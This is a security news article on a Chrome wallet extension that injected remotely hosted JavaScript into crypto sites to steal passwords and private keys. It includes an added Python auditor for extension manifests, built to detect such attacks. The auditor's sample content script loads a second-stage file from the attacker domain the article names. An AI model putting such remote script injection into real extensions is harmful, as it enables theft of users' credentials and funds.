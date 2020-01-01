

It was discovered that a Google Chrome extension injected JavaScript code into web pages to steal passwords and private keys from cryptocurrency wallets and cryptocurrency portals.

The extension is called Shitcoin Wallet (Chrome extension ID: ckkgmccefffnbbalkmbbgebbojjogffn), and was launched last month, on December 9.

According to an introductory blog post, Shitcoin Wallet allows users to manage Ether (ETH) as well as Ethereum ERC20 tokens, the kind of tokens generally issued for ICOs (initial coin offerings).

Users can install the Chrome extension and manage ETH and ERC20 tokens from their browser, or they can install a Windows desktop application if they prefer to manage their funds outside the riskier environment of a browser.

Breakdown of malicious behavior

However, the wallet application was not what it promised to be. Yesterday, Harry Denley, Security Director of the MyCrypto platform, discovered that the extension contained malicious code.

According to Denley, the extension is dangerous for users in two ways. First, any funds (ETH and ERC20-based tokens) managed directly within the extension are at risk.

Denley says the extension sends the private keys of all wallets created or managed through its interface to a third-party website located at erc20wallet(.)tk.

Second, the extension also actively injects malicious JavaScript code when users navigate to five well-known and popular cryptocurrency management platforms. This code steals login credentials and private keys, and the data is sent to the same third-party website, erc20wallet(.)tk.

According to an analysis of the malicious code, the process is as follows:

1. Users install the Chrome extension.

2. The Chrome extension requests permission to inject JavaScript (JS) code into 77 websites (listed here).

3. When users navigate to any of these 77 sites, the extension loads and injects an additional JS file from https://erc20wallet(.)tk/js/content_.js.

4. This JS file contains obfuscated code (uncovered here).

5. The code is activated on five websites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io and Switcheo.exchange.

6. Once activated, the malicious JS code captures the user's login credentials, searches for private keys stored within the dashboards of the five services and, finally, sends the data to erc20wallet(.)tk.
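The two signals in this sequence (content scripts allowed on a large number of sites, and a second-stage script fetched from an external host) are what a reviewer would look for when auditing an unpacked extension. The following is an added example, not code from the article or from the extension: it reads a manifest.json, counts the URL patterns its content scripts may run on, and scans the content script for remotely hosted .js files. The manifest and the content script are constructed samples; the only real value is the domain the article names.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample manifest (not the real extension's): content scripts that
# run on several wallet sites, as the article describes.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "example-wallet",
    "permissions": ["storage", "*://*.myetherwallet.com/*"],
    "content_scripts": [{
        "matches": ["*://*.myetherwallet.com/*", "*://*.binance.org/*",
                    "*://*.idex.market/*"],
        "js": ["content.js"],
    }],
})

# Constructed content script that pulls a second-stage file from an external
# host, the pattern the article attributes to the extension (domain from the article).
SAMPLE_CONTENT_JS = """
var s = document.createElement('script');
s.src = 'https://erc20wallet.tk/js/content_.js';
document.head.appendChild(s);
"""

REMOTE_JS = re.compile(r"""https?://[^\s'"<>]+\.js\b""")


def content_script_matches(manifest_text):
    """Return every URL pattern the extension's content scripts may run on."""
    manifest = json.loads(manifest_text)
    patterns = []
    for entry in manifest.get("content_scripts", []):
        patterns.extend(entry.get("matches", []))
    return patterns


def remote_script_urls(js_text):
    """Return http(s) .js URLs referenced by a content script (remote loading)."""
    return REMOTE_JS.findall(js_text)


def audit(manifest_text, js_text):
    """Summarise the two signals: breadth of injection and remote code hosts."""
    matches = content_script_matches(manifest_text)
    hosts = {urlparse(u).hostname for u in remote_script_urls(js_text)}
    return {
        "injection_sites": len(matches),
        "remote_script_hosts": sorted(hosts),
        "suspicious": bool(hosts),  # second-stage code from outside the package
    }
```

Run `audit()` over the manifest and each file listed under `content_scripts` of an unpacked extension; a non-empty `remote_script_hosts` list is the part worth reviewing by hand, since the fetched file can change at any time without a store update.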

At the time of writing this article, the extension was still available for download through the official Google Chrome web store, where 625 installations were listed.

It is not clear if the Shitcoin Wallet team is responsible for the malicious code, or if the Chrome extension was compromised by a third party. A spokesman for the Shitcoin Wallet team did not respond to a request for comment before the publication of this article.

Desktop application

On the official website of the extension, 32- and 64-bit installers were also made available to users.

Scanning with VirusTotal, a website that aggregates the scanning engines of several antivirus vendors, shows both files as clean.

However, numerous comments published on the Wallet's Telegram channel suggest that desktop applications may contain similar malicious code, if not worse.

